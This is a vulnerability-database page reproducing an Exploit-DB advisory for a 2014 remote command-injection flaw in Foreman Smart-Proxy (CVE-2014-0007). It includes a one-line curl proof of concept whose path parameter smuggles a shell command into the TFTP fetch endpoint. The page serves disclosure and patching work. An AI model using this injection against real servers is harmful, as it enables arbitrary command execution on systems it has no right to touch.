Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitdbLukas ZapletalEDB-ID:39222
HistoryJun 05, 2014 - 12:00 a.m.

Foreman Smart-Proxy - Remote Command Injection

2014-06-0500:00:00
Lukas Zapletal
www.exploit-db.com
27

AI Score

7.4

Confidence

Low

EPSS

0.035

Percentile

91.7%

JSON
source: https://www.securityfocus.com/bid/68117/info

Foreman is prone to a remote command-injection vulnerability.

Successful exploits will result in the execution of arbitrary commands with the privileges of the user running foreman-proxy. 

curl -3 -H "Accept:application/json" -k -X POST -d "dummy=exploit" 'https://www.example.com:8443/tftp/fetch_boot_file?prefix=a&path=%3Btouch%20%2Ftmp%2Fbusted%3B'

Related

veracode 1
cvelist 1
nvd 1
cve 1
redhat 1
prion 1
nessus 2
veracode
veracode
OS Command Injection
2019-01-15 08:54:13
cvelist
cvelist
CVE-2014-0007
2014-06-20 14:00:00
nvd
nvd
CVE-2014-0007
2014-06-20 14:55:06
cve
cve
CVE-2014-0007
2014-06-20 14:55:06
redhat
redhat
(RHSA-2014:0770) Critical: foreman-proxy security update
2014-06-19 00:00:00
prion
prion
Design/Logic Flaw
2014-06-20 14:55:00
nessus
nessus
RHEL 6 : foreman-proxy (RHSA-2014:0770)
2024-04-24 00:00:00
Foreman Smart-Proxy TFTP Remote Command Injection
2014-07-17 00:00:00

AI Score

7.4

Confidence

Low

EPSS

0.035

Percentile

91.7%

JSON
Related for EDB-ID:39222
veracode1cvelist1nvd1cve1redhat1prion1nessus2